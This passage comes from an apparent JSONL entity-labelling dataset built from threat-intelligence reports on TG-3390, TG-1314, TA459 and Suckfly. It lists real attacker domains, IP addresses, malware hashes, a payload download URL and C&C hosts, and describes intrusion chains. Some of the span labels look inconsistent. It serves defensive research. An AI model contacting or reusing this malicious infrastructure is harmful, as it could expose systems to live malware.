development team and a team focused on SWCs .", "spans": [{"start": 135, "end": 139, "label": "System"}]} {"text": "TG-3390 's obfuscation techniques in SWCs complicate 
detection of malicious web traffic redirects .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 37, "end": 41, "label": "System"}]} {"text": "Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": []} {"text": "CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 105, "end": 113, "label": "System"}, {"start": 160, "end": 189, "label": "System"}, {"start": 192, "end": 195, "label": "System"}]} {"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 56, "end": 59, "label": "Organization"}, {"start": 114, "end": 122, "label": "Vulnerability"}]} {"text": "The threat actors demonstrated the ability to adapt when reentering a network after an eviction , overcoming technical barriers constructed by network defenders .", "spans": []} {"text": "In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": [{"start": 21, "end": 25, "label": "System"}, {"start": 70, "end": 77, "label": "Organization"}, {"start": 97, "end": 103, "label": "System"}]} {"text": "CTU researchers assess with high confidence that the threat actors follow an established playbook during an intrusion .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "They quickly move away from their initial access vector to hide their entry point and then target Exchange servers as a new access vector .", 
"spans": []} {"text": "As of this publication , CTU researchers have not discovered how TG-3390 keeps track of the details associated with its compromised assets and credentials .", "spans": [{"start": 25, "end": 28, "label": "Organization"}, {"start": 65, "end": 72, "label": "Organization"}]} {"text": "However , the threat actors' ability to reuse these assets and credentials , sometimes weeks or months after the initial compromise , indicates the group is disciplined and well organized .", "spans": []} {"text": "After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": [{"start": 70, "end": 73, "label": "Organization"}, {"start": 88, "end": 95, "label": "Organization"}]} {"text": "TG-3390 : american.blackcmd.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 31, "label": "Indicator"}]} {"text": "TG-3390 : api.apigmail.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 26, "label": "Indicator"}]} {"text": "TG-3390 : apigmail.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 22, "label": "Indicator"}]} {"text": "TG-3390 : backup.darkhero.org .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 29, "label": "Indicator"}]} {"text": "TG-3390 : bel.updatawindows.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 31, "label": "Indicator"}]} {"text": "TG-3390 : binary.update-onlines.org .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 35, "label": "Indicator"}]} {"text": "TG-3390 : blackcmd.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 22, "label": "Indicator"}]} {"text": "TG-3390 : castle.blackcmd.com .", 
"spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 29, "label": "Indicator"}]} {"text": "TG-3390 : ctcb.blackcmd.com .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 27, "label": "Indicator"}]} {"text": "TG-3390 : darkhero.org .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 22, "label": "Indicator"}]} {"text": "TG-3390 : 208.115.242.36 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 24, "label": "Indicator"}]} {"text": "TG-3390 : 208.115.242.37 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 24, "label": "Indicator"}]} {"text": "TG-3390 : 208.115.242.38 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 24, "label": "Indicator"}]} {"text": "TG-3390 : 66.63.178.142 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]} {"text": "TG-3390 : 72.11.148.220 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]} {"text": "TG-3390 : 72.11.141.133 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]} {"text": "TG-3390 : 74.63.195.236 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}]} {"text": "TG-3390 : 74.63.195.237 . 1cb4b74e9d030afbb18accf6ee2bfca1 MD5 hash HttpBrowser RAT dropper . b333b5d541a0488f4e710ae97c46d9c2 MD5 hash HttpBrowser RAT dropper . 86a05dcffe87caf7099dda44d9ec6b48 MD5 hash HttpBrowser RAT dropper . 93e40da0bd78bebe5e1b98c6324e9b5b MD5 hash HttpBrowser RAT dropper . f43d9c3e17e8480a36a62ef869212419 MD5 hash HttpBrowser RAT dropper . 57e85fc30502a925ffed16082718ec6c MD5 hash HttpBrowser RAT dropper . 4251aaf38a485b08d5562c6066370f09 MD5 hash HttpBrowser RAT dropper . 
bbfd1e703f55ce779b536b5646a0cdc1 MD5 hash HttpBrowser RAT dropper . 12a522cb96700c82dc964197adb57ddf MD5 hash HttpBrowser RAT dropper . 728e5700a401498d91fb83159beec834 MD5 hash HttpBrowser RAT dropper . 2bec1860499aae1dbcc92f48b276f998 MD5 hash HttpBrowser RAT dropper . 014122d7851fa8bf4070a8fc2acd5dc5 MD5 hash HttpBrowser RAT . 0ae996b31a2c3ed3f0bc14c7a96bea38 MD5 hash HttpBrowser RAT . 1a76681986f99b216d5c0f17ccff2a12 MD5 hash HttpBrowser RAT . 380c02b1fd93eb22028862117a2f19e3 MD5 hash HttpBrowser RAT . 40a9a22da928cbb70df48d5a3106d887 MD5 hash HttpBrowser RAT . 46cf2f9b4a4c35b62a32f28ac847c575 MD5 hash HttpBrowser RAT . 5436c3469cb1d87ea404e8989b28758d MD5 hash HttpBrowser RAT . 692cecc94ac440ec673dc69f37bc0409 MD5 hash HttpBrowser RAT .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 10, "end": 23, "label": "Indicator"}, {"start": 26, "end": 58, "label": "Indicator"}, {"start": 68, "end": 79, "label": "Malware"}, {"start": 94, "end": 126, "label": "Indicator"}, {"start": 136, "end": 147, "label": "Malware"}, {"start": 162, "end": 194, "label": "Indicator"}, {"start": 204, "end": 215, "label": "Malware"}, {"start": 230, "end": 262, "label": "Indicator"}, {"start": 272, "end": 283, "label": "Malware"}, {"start": 298, "end": 330, "label": "Indicator"}, {"start": 340, "end": 351, "label": "Malware"}, {"start": 366, "end": 398, "label": "Indicator"}, {"start": 408, "end": 419, "label": "Malware"}, {"start": 434, "end": 466, "label": "Indicator"}, {"start": 476, "end": 487, "label": "Malware"}, {"start": 502, "end": 534, "label": "Indicator"}, {"start": 544, "end": 555, "label": "Malware"}, {"start": 570, "end": 602, "label": "Indicator"}, {"start": 612, "end": 623, "label": "Malware"}, {"start": 638, "end": 670, "label": "Indicator"}, {"start": 680, "end": 691, "label": "Malware"}, {"start": 706, "end": 738, "label": "Indicator"}, {"start": 748, "end": 759, "label": "Malware"}, {"start": 774, "end": 806, "label": "Indicator"}, {"start": 816, 
"end": 827, "label": "Malware"}, {"start": 834, "end": 866, "label": "Indicator"}, {"start": 876, "end": 887, "label": "Malware"}, {"start": 894, "end": 926, "label": "Indicator"}, {"start": 936, "end": 947, "label": "Malware"}, {"start": 954, "end": 986, "label": "Indicator"}, {"start": 996, "end": 1007, "label": "Malware"}, {"start": 1014, "end": 1046, "label": "Indicator"}, {"start": 1056, "end": 1067, "label": "Malware"}, {"start": 1074, "end": 1106, "label": "Indicator"}, {"start": 1116, "end": 1127, "label": "Malware"}, {"start": 1134, "end": 1166, "label": "Indicator"}, {"start": 1176, "end": 1187, "label": "Malware"}, {"start": 1194, "end": 1226, "label": "Indicator"}, {"start": 1236, "end": 1247, "label": "Malware"}]} {"text": "Living Off the Land .", "spans": []} {"text": "Release_Time : 2015-05-28", "spans": []} {"text": "Report_URL : https://www.secureworks.com/blog/living-off-the-land", "spans": []} {"text": "In over half of the targeted threat response engagements performed by the Dell SecureWorks Counter Threat Unit Special Operations ( CTU-SO ) team in the past year , the threat actors accessed the target environment using compromised credentials and the companies' own virtual private network ( VPN ) or other remote access solutions .", "spans": [{"start": 74, "end": 129, "label": "Organization"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 268, "end": 291, "label": "System"}, {"start": 294, "end": 297, "label": "System"}]} {"text": "Detecting threat actors who are \" living off the land , \" using credentials , systems , and tools they collect along the way instead of backdoors , can be challenging for organizations that focus their instrumentation and controls primarily on the detection of malware and indicators such as command and control IP addresses , domains , and protocols .", "spans": []} {"text": "With their gaps in visibility , these organizations can have a very difficult time distinguishing adversary activity from that 
of legitimate users , pushing detection times out to weeks , months , or even years .", "spans": []} {"text": "Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 ( TG-1314 ) , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": [{"start": 11, "end": 14, "label": "Organization"}, {"start": 68, "end": 85, "label": "Organization"}, {"start": 88, "end": 95, "label": "Organization"}]} {"text": "In this case , the threat actors used compromised credentials to log into an Internet-facing Citrix server to gain access to the network .", "spans": [{"start": 77, "end": 92, "label": "System"}, {"start": 93, "end": 99, "label": "System"}]} {"text": "CTU researchers discovered evidence that the threat actors were not only leveraging the company 's remote access infrastructure , but were also using the company 's endpoint management platform , Altiris , to move laterally through the network .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 196, "end": 203, "label": "System"}]} {"text": "Memory collection and analysis can be an extremely valuable component of an incident response plan and in this case proved crucial in identifying TG-1314 's actions on objective .", "spans": [{"start": 146, "end": 153, "label": "Organization"}]} {"text": "Memory collected from systems involved in the intrusion was analyzed using the Volatility framework .", "spans": []} {"text": "First , Volatility 's pstree plugin , which lists running processes in a tree view , was executed .", "spans": [{"start": 8, "end": 18, "label": "System"}, {"start": 22, "end": 28, "label": "System"}, {"start": 29, "end": 35, "label": "System"}]} {"text": "The result immediately revealed signs of a suspicious cmd.exe process running as a child of the ACLIENT.EXE process .", "spans": [{"start": 54, "end": 61, "label": "Indicator"}, {"start": 96, "end": 107, "label": "Indicator"}]} {"text": "CTU 
researchers immediately recognized suspicious commands , such as changing the working directory to recycler and executing commands from that location , that were unlikely to have been connected to legitimate system administrator operations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "The results also revealed indications that PsExec , a popular system administration tool for executing commands on remote systems , was run against several target hosts to spawn shells on them .", "spans": [{"start": 43, "end": 49, "label": "System"}]} {"text": "To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": [{"start": 97, "end": 100, "label": "Organization"}, {"start": 122, "end": 129, "label": "Indicator"}]} {"text": "While cmd.exe is a console application , it still requires GUI like functionality and other support to interact with the operating system .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 59, "end": 62, "label": "System"}]} {"text": "On the Windows XP platform , this support is provided by the csrss.exe process .", "spans": [{"start": 7, "end": 17, "label": "System"}, {"start": 61, "end": 70, "label": "Indicator"}]} {"text": "Because commands run from cmd.exe are acted on by csrss.exe , additional evidence of command history and responses sent to the cmd console window are often discoverable by analyzing the csrss.exe process 's memory .", "spans": [{"start": 26, "end": 33, "label": "Indicator"}, {"start": 50, "end": 59, "label": "Indicator"}, {"start": 186, "end": 195, "label": "Indicator"}]} {"text": "The output in Figure 3 shows the Process ID ( PID ) of the csrss.exe process to be 716 .", "spans": [{"start": 33, "end": 43, "label": "System"}, {"start": 46, "end": 49, "label": "System"}, {"start": 59, "end": 68, "label": "Indicator"}]} {"text": 
"Running Volatility 's vaddump plugin on this process allowed CTU researchers to obtain the Virtual Address Descriptor ( VAD ) sections .", "spans": [{"start": 8, "end": 18, "label": "System"}, {"start": 22, "end": 29, "label": "System"}, {"start": 30, "end": 36, "label": "System"}, {"start": 61, "end": 64, "label": "Organization"}, {"start": 91, "end": 117, "label": "System"}, {"start": 120, "end": 123, "label": "System"}]} {"text": "The relevant strings inside the VAD sections were UTF-16 encoded and revealed additional insights once extracted .", "spans": [{"start": 32, "end": 35, "label": "System"}, {"start": 50, "end": 56, "label": "System"}]} {"text": "TG-1314 was mapping network drives using a compromised Altiris account to connect to additional systems .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 55, "end": 62, "label": "System"}]} {"text": "After identifying compromised credentials and executed commands , CTU researchers shifted focus to determine how the threat actors were obtaining the shell and executing their commands on the compromised host .", "spans": [{"start": 66, "end": 69, "label": "Organization"}]} {"text": "This exploration required a look at the suspect cmd.exe 's parent process , shown earlier in the investigation to be ACLIENT.EXE .", "spans": [{"start": 48, "end": 55, "label": "Indicator"}, {"start": 117, "end": 128, "label": "Indicator"}]} {"text": "Volatility 's procdump command was used to dump the executable from memory .", "spans": [{"start": 0, "end": 10, "label": "System"}]} {"text": "Running the strings utility against the dumped ACLIENT.EXE binary revealed evidence that the file was the Altiris agent .", "spans": [{"start": 47, "end": 58, "label": "Indicator"}, {"start": 106, "end": 113, "label": "System"}]} {"text": "These results indicated that the threat actors leveraged the Altiris management platform installed at the client site , along with compromised domain credentials associated with the 
Altiris system , to move laterally within the compromised environment .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 182, "end": 189, "label": "System"}]} {"text": "Threat groups often follow a path of least resistance to achieve their objective .", "spans": []} {"text": "They will leverage legitimate remote access solutions for entry and valid system administrator tools for lateral movement , if possible .", "spans": []} {"text": "To help disrupt this tactic , it is important that organizations implement two-factor authentication for all remote access solutions and consider doing the same for internal , high-value assets like their internal system management consoles .", "spans": []} {"text": "CTU researchers assess with high confidence that threat groups like TG-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 68, "end": 75, "label": "Organization"}]} {"text": "APT Targets Financial Analysts with CVE-2017-0199 .", "spans": [{"start": 36, "end": 49, "label": "Vulnerability"}]} {"text": "On April 20 , Proofpoint observed a targeted campaign focused on financial analysts working at top global financial firms operating in Russia and neighboring countries .", "spans": [{"start": 14, "end": 24, "label": "Organization"}]} {"text": "These analysts were linked by their coverage of the telecommunications industry , making this targeting very similar to , and likely a continuation of , activity described in our \u201c In Pursuit of Optical Fibers and Troop Intel \u201d blog .", "spans": []} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 70, "end": 76, "label": "System"}, {"start": 84, "end": 93, "label": 
"Organization"}, {"start": 94, "end": 98, "label": "System"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 175, "label": "Malware"}, {"start": 176, "end": 182, "label": "Malware"}, {"start": 214, "end": 219, "label": "Malware"}, {"start": 220, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}]} {"text": "Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": [{"start": 77, "end": 82, "label": "Organization"}]} {"text": "The actor typically targets Central Asian countries , Russia , Belarus , Mongolia , and others .", "spans": []} {"text": "TA459 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 52, "end": 57, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 78, "end": 83, "label": "Malware"}]} {"text": "In this blog , we also document other 2017 activity so far by this attack group , including their distribution of ZeroT malware and secondary payloads PCrat S-VULNAME/Gh0st .", "spans": [{"start": 114, "end": 119, "label": "Malware"}, {"start": 151, "end": 172, "label": "Vulnerability"}]} {"text": "In this campaign , attackers used a Microsoft Word document called 0721.doc , which exploits CVE-2017-0199 .", "spans": [{"start": 36, "end": 45, "label": "Organization"}, {"start": 46, "end": 50, "label": "System"}, {"start": 67, "end": 75, "label": "Indicator"}, {"start": 93, "end": 106, "label": "Vulnerability"}]} {"text": "This vulnerability was disclosed and patched days prior to this attack .", "spans": []} {"text": "The document uses the logic flaw to first download the file power.rtf from http://122.9.52.215/news/power.rtf .", "spans": [{"start": 60, "end": 69, "label": "Indicator"}, {"start": 75, "end": 109, "label": "Indicator"}]} {"text": "The payload is actually an HTML Application ( HTA ) file , not an RTF document .", "spans": 
[{"start": 27, "end": 31, "label": "System"}, {"start": 46, "end": 49, "label": "System"}, {"start": 66, "end": 69, "label": "System"}]} {"text": "The HTA \u2019s VBScript changes the window size and location and then uses PowerShell to download yet another script : power.ps1 .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 11, "end": 19, "label": "System"}, {"start": 32, "end": 38, "label": "System"}, {"start": 71, "end": 81, "label": "System"}, {"start": 115, "end": 124, "label": "Indicator"}]} {"text": "This is a PowerShell script that downloads and runs the ZeroT payload cgi.exe .", "spans": [{"start": 10, "end": 20, "label": "System"}, {"start": 56, "end": 61, "label": "Malware"}, {"start": 70, "end": 77, "label": "Indicator"}]} {"text": "The attack group has made incremental changes to ZeroT since our last analysis .", "spans": [{"start": 49, "end": 54, "label": "Malware"}]} {"text": "While they still use RAR SFX format for the initial payloads , ZeroT now uses the legitimate McAfee utility ( SHA256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe ) named mcut.exe instead of the Norman Safeground AS for sideloading as they have in the past .", "spans": [{"start": 21, "end": 24, "label": "System"}, {"start": 25, "end": 28, "label": "System"}, {"start": 63, "end": 68, "label": "Malware"}, {"start": 93, "end": 99, "label": "Organization"}, {"start": 117, "end": 181, "label": "Indicator"}, {"start": 190, "end": 198, "label": "Indicator"}, {"start": 214, "end": 234, "label": "Organization"}]} {"text": "The encrypted ZeroT payload , named Mctl.mui , is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 36, "end": 44, "label": "Indicator"}, {"start": 99, "end": 101, "label": "System"}, {"start": 158, "end": 163, "label": "Malware"}]} {"text": "Once ZeroT is running , 
we observed that the fake User-Agent used in the requests changed from \u201c Mozilla/6.0 ( compatible ; MSIE 10.0 ; Windows NT 6.2 ; Tzcdrnt/6.0 ) \u201d to \u201c Mozilla/6.0 ( compatible ; MSIE 11.0 ; Windows NT 6.2 ) \u201d , thus removing the \u201c Tzcdrnt \u201d typo observed in previous versions .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 136, "end": 143, "label": "System"}, {"start": 213, "end": 220, "label": "System"}]} {"text": "The initial beacon to index.php changed to index.txt but ZeroT still expects an RC4 encrypted response using a static key : \u201c (*^GF (9042&* \u201d .", "spans": [{"start": 22, "end": 31, "label": "Indicator"}, {"start": 43, "end": 52, "label": "Indicator"}, {"start": 57, "end": 62, "label": "Malware"}]} {"text": "Next , ZeroT uses HTTP beacons to transmit information about the infected system to the command and control ( C&C ) .", "spans": [{"start": 7, "end": 12, "label": "Malware"}, {"start": 18, "end": 22, "label": "Indicator"}, {"start": 88, "end": 107, "label": "System"}, {"start": 110, "end": 113, "label": "System"}]} {"text": "All posts are encrypted , unlike the last time we analyzed a sample from this actor , when the first POST was accidentally not encrypted .", "spans": []} {"text": "After that , stage 2 payloads are still retrieved as Bitmap ( BMP ) images that use Least Significant Bit ( LSB ) Steganography to hide the real payloads .", "spans": [{"start": 53, "end": 59, "label": "System"}, {"start": 62, "end": 65, "label": "System"}, {"start": 68, "end": 74, "label": "System"}, {"start": 84, "end": 105, "label": "System"}, {"start": 108, "end": 111, "label": "System"}, {"start": 114, "end": 127, "label": "System"}]} {"text": "These images appear normal in image viewers .", "spans": [{"start": 6, "end": 12, "label": "System"}, {"start": 30, "end": 35, "label": "System"}]} {"text": "The stage 2 payload was PlugX that beaconed to C&C servers www.icefirebest.com and www.icekkk.net .", 
"spans": [{"start": 24, "end": 29, "label": "Malware"}, {"start": 47, "end": 50, "label": "System"}, {"start": 59, "end": 78, "label": "Indicator"}, {"start": 83, "end": 97, "label": "Indicator"}]} {"text": "Throughout 2017 we observed this threat actor actively attempting to compromise victims with various malware payloads .", "spans": []} {"text": "ZeroT remained the primary stage 1 payload , but the stage 2 payloads varied .", "spans": [{"start": 0, "end": 5, "label": "Malware"}]} {"text": "One such interesting example was \u201c \u041f\u041b\u0410\u041d_\u0420\u0415\u0410\u041b\u0418\u0417\u0410\u0426\u0418\u0418_\u041f\u0420\u041e\u0415\u041a\u0422\u0410.rar \u201d ( SHA256 b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda ) .", "spans": [{"start": 35, "end": 62, "label": "Indicator"}, {"start": 74, "end": 138, "label": "Indicator"}]} {"text": "Translated from Russian , this file is named \u201c PROJECT_REALIZATION_PLAN.rar \u201d and contains a compressed .scr executable .", "spans": [{"start": 47, "end": 75, "label": "Indicator"}, {"start": 104, "end": 108, "label": "Indicator"}]} {"text": "This ZeroT executable communicated with the C&C domain www.kz-info.net and downloaded PlugX as well as an additional PCRat S-VULNAME/Gh0st Trojan which communicated with the www.ruvim.net C&C server .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 44, "end": 47, "label": "System"}, {"start": 55, "end": 70, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Malware"}, {"start": 117, "end": 138, "label": "Vulnerability"}, {"start": 139, "end": 145, "label": "Malware"}, {"start": 174, "end": 187, "label": "Indicator"}, {"start": 188, "end": 191, "label": "System"}]} {"text": "PCRat S-VULNAME/Gh0st is a payload that we do not see this group using frequently .", "spans": [{"start": 0, "end": 21, "label": "Vulnerability"}]} {"text": "Another interesting ZeroT sample ( SHA256 
bc2246813d7267608e1a80a04dac32da9115a15b1550b0c4842b9d6e2e7de374 ) contained the executable 0228.exe and a decoy document 0228.doc in the RAR SFX archive .", "spans": [{"start": 20, "end": 25, "label": "Malware"}, {"start": 42, "end": 106, "label": "Indicator"}, {"start": 134, "end": 142, "label": "Indicator"}, {"start": 164, "end": 172, "label": "Indicator"}, {"start": 180, "end": 183, "label": "System"}, {"start": 184, "end": 187, "label": "System"}]} {"text": "Bundling decoy documents is a common tactic by this group .", "spans": []} {"text": "RAR SFX directives are used to display the decoy while the malicious payload is executed .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 4, "end": 7, "label": "System"}]} {"text": "We suspect that this specific lure was copied from the news article http://www.cis.minsk.by/news.php?id=7557 .", "spans": [{"start": 68, "end": 108, "label": "Indicator"}]} {"text": "TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "However , their strategy , tactics , techniques , and procedures in this particular attack emphasize the importance of rigorous patching regimens for all organizations .", "spans": []} {"text": "Even as software vulnerabilities often take a back seat to human exploits and social engineering , robust defenses must include protection at the email gateway , proactive patch management , and thoughtful end user education .", "spans": [{"start": 146, "end": 151, "label": "System"}]} {"text": "Paying attention to the details of past attacks is also an important means of preparing for future attacks .", "spans": []} {"text": "Noting who is targeted , with what malware , and with what types of lures provide clues with which organizations can improve their security posture .", "spans": []} {"text": "At the same time , multinational organizations like the financial services firms targeted here must be 
acutely aware of the threats from state-sponsored actors working with sophisticated malware to compromise users and networks .", "spans": []} {"text": "Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day .", "spans": [{"start": 41, "end": 46, "label": "Organization"}]} {"text": "Suckfly : Revealing the secret life of your code signing certificates .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Release_Time : 2016-03-15 Report_URL : https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=62e325ae-f551-4855-b9cf-28a7d52d1534&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "spans": []} {"text": "In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 15, "end": 23, "label": "Organization"}]} {"text": "Normally , this is considered a low-level alert easily defeated by security software .", "spans": []} {"text": "In this case , however , the hacktool had an unusual characteristic not typically seen with this type of file ; it was signed with a valid code-signing certificate .", "spans": []} {"text": "Many hacktools are made for less than ethical purposes and are freely available , so this was an initial red flag , which led us to investigate further .", "spans": []} {"text": "As our investigation continued , we soon realized this was much larger than a few hacktools .", "spans": []} {"text": "We discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware .", "spans": [{"start": 14, "end": 
21, "label": "Organization"}]} {"text": "The group had obtained the certificates through pre-attack operations before commencing targeted attacks against a number of government and commercial organizations spread across multiple continents over a two-year period .", "spans": []} {"text": "This type of activity and the malicious use of stolen certificates emphasizes the importance of safeguarding certificates to prevent them from being used maliciously .", "spans": []} {"text": "Suckfly has a number of hacktools and malware varieties at its disposal : Back door , Keylogger , Port scanner , Misc. tool , Exploit , Credential dumper , Privilege escalation .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 74, "end": 83, "label": "System"}, {"start": 86, "end": 95, "label": "System"}, {"start": 98, "end": 110, "label": "System"}, {"start": 113, "end": 118, "label": "System"}, {"start": 126, "end": 133, "label": "System"}, {"start": 147, "end": 153, "label": "System"}, {"start": 156, "end": 176, "label": "Vulnerability"}]} {"text": "The first signed hacktool we identified in late 2015 was a digitally signed brute-force server message block ( SMB ) scanner .", "spans": [{"start": 88, "end": 108, "label": "System"}, {"start": 111, "end": 114, "label": "System"}]} {"text": "The organization associated with this certificate is a South Korean mobile software developer .", "spans": []} {"text": "While we became initially curious because the hacktool was signed , we became more suspicious when we realized a mobile software developer had signed it , since this is not the type of software typically associated with a mobile application .", "spans": []} {"text": "Based on this discovery , we began to look for other binaries signed with the South Korean mobile software developer's certificate .", "spans": []} {"text": "This led to the discovery of three additional hacktools also signed using this certificate .", "spans": []} {"text": "In addition to being 
signed with a stolen certificate , the identified hacktools had been used in suspicious activity against a US based health provider operating in India .", "spans": []} {"text": "This evidence indicates that the certificate \u2019s rightful owner either misused it or it had been stolen from them .", "spans": []} {"text": "Symantec worked with the certificate owner to confirm that the hacktool was not associated with them .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "Following the trail further , we traced malicious traffic back to where it originated from and looked for additional evidence to indicate that the attacker persistently used the same infrastructure .", "spans": []} {"text": "We discovered the activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": [{"start": 58, "end": 60, "label": "Indicator"}]} {"text": "In addition to the traffic originating from Chengdu , we identified a selection of hacktools and malware signed using nine stolen certificates .", "spans": []} {"text": "The nine stolen certificates originated from nine different companies who are physically located close together around the central districts of Seoul , South Korea .", "spans": []} {"text": "We don't know the exact date Suckfly stole the certificates from the South Korean organizations .", "spans": [{"start": 29, "end": 36, "label": "Organization"}]} {"text": "However , by analyzing the dates when we first saw the certificates paired with hacktools or malware , we can gain insight into when the certificates may have been stolen .", "spans": []} {"text": "Figure 4 details how many times each stolen certificate was used in a given month .", "spans": []} {"text": "The first sighting of three of the nine stolen certificates being used maliciously occurred in early 2014 .", "spans": []} {"text": "Those three certificates were the only ones used in 2014 , making it likely that the other six were not compromised until 2015 
.", "spans": []} {"text": "All nine certificates were used maliciously in 2015 .", "spans": []} {"text": "As noted earlier , the stolen certificates Symantec identified in this investigation were used to sign both hacking tools and malware .", "spans": [{"start": 43, "end": 51, "label": "Organization"}]} {"text": "Further analysis of the malware identified what looks like a custom back door .", "spans": [{"start": 68, "end": 77, "label": "System"}]} {"text": "We believe Suckfly specifically developed the back door for use in cyberespionage campaigns .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 46, "end": 55, "label": "System"}]} {"text": "Symantec detects this threat as Backdoor.Nidiran .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 32, "end": 48, "label": "Malware"}]} {"text": "Analysis of Nidiran samples determined that the back door had been updated three times since early 2014 , which fits the timeline outlined in Figure 4 .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 48, "end": 57, "label": "System"}]} {"text": "The modifications were minor and likely performed to add capabilities and avoid detection .", "spans": []} {"text": "While the malware is custom , it only provides the attackers with standard back door capabilities .", "spans": [{"start": 75, "end": 84, "label": "System"}]} {"text": "Suckfly delivered Nidiran through a strategic web compromise .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 18, "end": 25, "label": "Malware"}]} {"text": "Specifically , the threat group used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": [{"start": 96, "end": 105, "label": "Organization"}, {"start": 106, "end": 113, "label": "System"}, {"start": 114, "end": 124, "label": "System"}, {"start": 156, "end": 169, 
